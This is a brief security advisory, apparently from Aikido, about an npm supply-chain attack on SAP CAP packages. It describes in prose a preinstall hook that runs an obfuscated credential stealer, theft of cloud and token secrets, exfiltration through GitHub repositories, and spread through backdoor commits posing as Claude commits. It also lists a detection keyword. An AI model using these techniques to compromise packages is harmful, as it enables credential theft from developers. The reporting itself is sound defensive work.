A new npm supply-chain attack is targeting SAP CAP developer packages (@cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, mbt). Compromised versions inject a preinstall hook that downloads the Bun runtime and executes an 11.7 MB obfuscated credential stealer. The payload harvests GitHub tokens, npm tokens, AWS/Azure/GCP/Kubernetes secrets, GitHub Actions secrets, and local developer credentials. Stolen data is encrypted with AES-256-GCM and exfiltrated via newly created public GitHub repositories with Dune-themed names. The malware also propagates by modifying release tarballs and pushing backdoor files into repositories using stolen tokens, masquerading as Claude commits. Detection involves searching for specific package versions, file names, and the propagation keyword 'OhNoWhatsGoingOnWithGitHub' in GitHub commits. Affected users should immediately rotate all secrets across GitHub, npm, and cloud providers.
Table of contents
What HappenedHow The Malware RunsWhat It StealsGitHub Exfiltration And Propagation KeywordPropagation LogicSAP As a TargetDetection And MitigationHow Aikido Detects ThisIndicators Of CompromiseSort: